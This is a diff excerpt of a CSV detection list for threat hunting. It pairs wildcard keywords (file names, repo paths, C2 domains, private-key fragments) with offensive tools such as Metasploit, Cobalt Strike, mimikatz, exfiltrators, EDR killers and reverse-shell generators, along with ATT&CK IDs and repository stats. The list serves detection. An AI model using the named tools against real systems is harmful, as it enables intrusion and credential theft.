TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*meterpreter.*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*Meterpreter.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*meterpreter.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*meterpreter_*.rb","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*meterpreter_loader*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*METERPRETER_STAGER*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*MeteTool*","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2023-06-10T06:24:14Z","2020-05-09T19:09:17Z" "*methodHash*528465795*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" -"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*methods::dns::dns_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*methods::https::https_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*methods::icmp::icmp_exfiltrator*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Metro-Holografix/CSExec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" "*Metro-Holografix/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*metsrv.dll*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-02T13:11:58Z","2014-04-03T21:18:24Z" +"*metterpreter*","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","N/A","10","1555","675","2023-10-04T11:56:37Z","2014-04-03T21:18:24Z" "*MFASweep.ps1*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*mgeeky/PackMyPayload*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*mgeeky/RedWarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*mhaskar/Octopus*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*mhuzaifi0604/spellbound*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" -"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*mhydeath.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*mhydeath-master*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*micahvandeusen/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*micr0 shell.py*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*micr0_shell-main*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*micr0shell.py *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" "*microbrownys.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Az.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureAD*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureREST*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-AzureRM*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-master*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-Misc.psm1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*MicroBurst-MSOL*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*microchsse.strangled.net*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microlilics.crabdance.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*micronaoko.jumpingcrab.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" @@ -13553,54 +13711,54 @@ "*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*mimi32.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimi64.exe *","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv (mimikatz)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*mimidrv*","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 